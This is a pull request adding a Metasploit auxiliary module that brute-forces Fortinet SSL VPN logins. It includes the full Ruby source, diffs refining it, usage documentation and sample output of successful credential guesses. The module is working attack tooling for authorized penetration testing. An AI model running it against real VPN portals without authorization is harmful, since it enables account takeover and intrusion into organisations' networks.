### PR TITLE
Add Fortinet SSL login scanner Aux Mod

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/fortinet_ssl_vpn.md
+++ b/documentation/modules/auxiliary/scanner/http/fortinet_ssl_vpn.md
@@ -1,0 +1,40 @@
+This module tests credentials on Fortinet SSL VPN servers (FortiGate).
+
+NOTE: This module is only executing when Fortinet SSL VPN Server is detected.
+When the server cannot be verified the module stops working.
+The realm/domain is used for every request when set.
+
+The module supports IPv6 requests.
+The module supports several hosts at the same time.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/fortinet_ssl_vpn```
+2. Do: ```set RHOSTS [IP]```
+3. Configure a user and password list by setting either `USERNAME`, `PASSWORD`, `USER_FILE`, or `PASS_FILE`.
+4. Do: ```run```
+
+## Scenarios
+
+IP-Addresses have been masked with x
+
+```
+msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run
+
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Server is responsive...
+[+] xxxx:xxxx:xxxx:xxxx::4:443 - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - Starting login brute force...
+[*] xxxx:xxxx:xxxx:xxxx::4:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 1 of 2 hosts (50% complete)
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Server is responsive...
+[+] xxx.xxx.xxx.xxx:443 - [1/1] - Application appears to be Fortinet SSL VPN. Module will continue.
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Starting login brute force...
+[*] xxx.xxx.xxx.xxx:443 - [1/1] - Trying username:"testuser" with password:"superpass"
+[+] SUCCESSFUL LOGIN - "testuser":"superpass"
+[!] No active DB -- Credential data will not be saved!
+[*] Scanned 2 of 2 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+```

--- a/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
+++ b/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rex/proto/http'
-
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
@@ -29,7 +27,6 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        Opt::RPORT(443),
         OptString.new('DOMAIN', [false, "Domain/Realm to use for each account", ''])
       ])
   end
@@ -122,7 +119,6 @@ class MetasploitModule < Msf::Auxiliary
     vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}")
 
     begin
-      cookie = ""
       post_params = {
         'ajax'  => '1',
         'username' => user,

--- a/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
+++ b/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
@@ -18,10 +18,7 @@ class MetasploitModule < Msf::Auxiliary
         This module scans for Fortinet SSL VPN web login portals and
         performs login brute force to identify valid credentials.
       },
-      'Author'         =>
-        [
-          'Max Michels <kontakt[at]maxmichels.de>'
-        ],
+      'Author'         => [ 'Max Michels <kontakt[at]maxmichels.de>' ],
       'License'        => MSF_LICENSE,
       'DefaultOptions' =>
         {
@@ -56,7 +53,7 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
-  # Verify whether the connection is working or not
+  # Verify if server is responding
   def check_conn?
     begin
       res = send_request_cgi('uri' => '/', 'method' => 'GET')
@@ -82,7 +79,6 @@ class MetasploitModule < Msf::Auxiliary
   # Verify whether we're working with SSL VPN or not
   def is_app_ssl_vpn?
     res = get_login_resource
-    vprint_good("HTTP Response code: #{res.code}")
     res && res.code == 200 && res.body.match(/fortinet/)
   end
 
@@ -137,7 +133,8 @@ class MetasploitModule < Msf::Auxiliary
         'username' => user,
         'credential' => pass
       }
-      #check if domain is empty
+
+      #check to use domain/realm or not
       if datastore['DOMAIN'].nil? || datastore['DOMAIN'].empty?
         post_params['realm'] = ""
       else
@@ -156,8 +153,6 @@ class MetasploitModule < Msf::Auxiliary
          res.code == 200 &&
          res.body.match(/redir=/) &&
          res.body.match(/&portal=/)
-
-        print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
         do_logout(res.get_cookies)
         if datastore['DOMAIN'].nil? || datastore['DOMAIN'].empty?

--- a/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
+++ b/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
@@ -122,6 +122,7 @@ class MetasploitModule < Msf::Auxiliary
     vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}")
 
     begin
+      cookie = ""
       post_params = {
         'ajax'  => '1',
         'username' => user,

--- a/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
+++ b/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
@@ -1,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/proto/http'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Fortinet SSL VPN Bruteforce Login Utility',
+      'Description'    => %{
+        This module scans for Fortinet SSL VPN web login portals and
+        performs login brute force to identify valid credentials.
+      },
+      'Author'         =>
+        [
+          'Max Michels <kontakt[at]maxmichels.de>'
+        ],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'RPORT' => 443
+        }
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+      ])
+  end
+
+  def run_host(ip)
+    unless check_conn?
+      vprint_error("Connection failed, Aborting...")
+      return false
+    end
+
+    unless is_app_ssl_vpn?
+      vprint_error("Application does not appear to be Fortinet SSL VPN. Module will not continue.")
+      return false
+    end
+
+    vprint_good("Application appears to be Fortinet SSL VPN. Module will continue.")
+
+    vprint_status("Starting login brute force...")
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+  end
+
+  # Verify whether the connection is working or not
+  def check_conn?
+    begin
+      res = send_request_cgi('uri' => '/', 'method' => 'GET')
+      if res
+        vprint_good("Server is responsive...")
+        return true
+      end
+    rescue ::Rex::ConnectionRefused,
+           ::Rex::HostUnreachable,
+           ::Rex::ConnectionTimeout,
+           ::Rex::ConnectionError,
+           ::Errno::EPIPE
+    end
+    false
+  end
+
+  def get_login_resource
+    send_request_cgi(
+      'uri' => '/remote/login?lang=en',
+      'method' => 'GET'
+    )
+  end
+
+  # Verify whether we're working with SSL VPN or not
+  def is_app_ssl_vpn?
+    res = get_login_resource
+    vprint_good("HTTP Response code: #{res.code}")
+    res && res.code == 200 && res.body.match(/fortinet/)
+  end
+
+  def do_logout(cookie)
+    send_request_cgi(
+      'uri' => '/remote/logout',
+      'method' => 'GET',
+      'cookie' => cookie
+    )
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'Fortinet SSL VPN',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  # Brute-force the login page
+  def do_login(user, pass)
+    vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}")
+
+    begin
+      cookie = "SVPNCOOKIE=; " +
+               "path=/; " +
+               "expires=Wed, 13-Feb-2019 23:45:12 GMT; " +
+               "secure; " +
+               "httponly; "
+
+      post_params = {
+        'ajax'  => '1',
+        'username' => user,
+        'realm' => '',
+        'credential' => pass
+      }
+
+      res = send_request_cgi(
+              'uri' => '/remote/logincheck',
+              'method' => 'POST',
+              'ctype' => 'application/x-www-form-urlencoded',
+              #'cookie' => cookie,
+              'vars_post' => post_params
+            )
+
+      if res &&
+         res.code == 200 &&
+         res.body.match(/redir=/) &&
+         res.body.match(/&portal=/)
+
+        print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+
+        do_logout(res.get_cookies)
+
+        report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)
+        report_note(ip: rhost, type: "fortinet.ssl.vpn",data: "User: #{user}")
+        return :next_user
+
+      else
+        vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
+      end
+
+    rescue ::Rex::ConnectionRefused,
+           ::Rex::HostUnreachable,
+           ::Rex::ConnectionTimeout,
+           ::Rex::ConnectionError,
+           ::Errno::EPIPE
+      vprint_error("HTTP Connection Failed, Aborting")
+      return :abort
+    end
+  end
+end
+

--- a/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
+++ b/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
@@ -73,9 +73,8 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_login_resource
-    send_request_cgi(
-      'uri' => '/remote/login?lang=en',
-      'method' => 'GET'
+    send_request_raw(
+      'uri' => '/remote/login?lang=en'
     )
   end
 

--- a/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
+++ b/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb
@@ -122,12 +122,6 @@ class MetasploitModule < Msf::Auxiliary
     vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}")
 
     begin
-      cookie = "SVPNCOOKIE=; " +
-               "path=/; " +
-               "expires=Wed, 13-Feb-2019 23:45:12 GMT; " +
-               "secure; " +
-               "httponly; "
-
       post_params = {
         'ajax'  => '1',
         'username' => user,
@@ -145,7 +139,6 @@ class MetasploitModule < Msf::Auxiliary
               'uri' => '/remote/logincheck',
               'method' => 'POST',
               'ctype' => 'application/x-www-form-urlencoded',
-              #'cookie' => cookie,
               'vars_post' => post_params
             )
 


### PR DESCRIPTION
Adding a new scanner to bruteforce the login of Fortinet SSL VPN.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/http/fortinet_ssl_vpn`
- [ ] set  username
- [ ] set  password
- [ ] set  rhost
- [ ] run
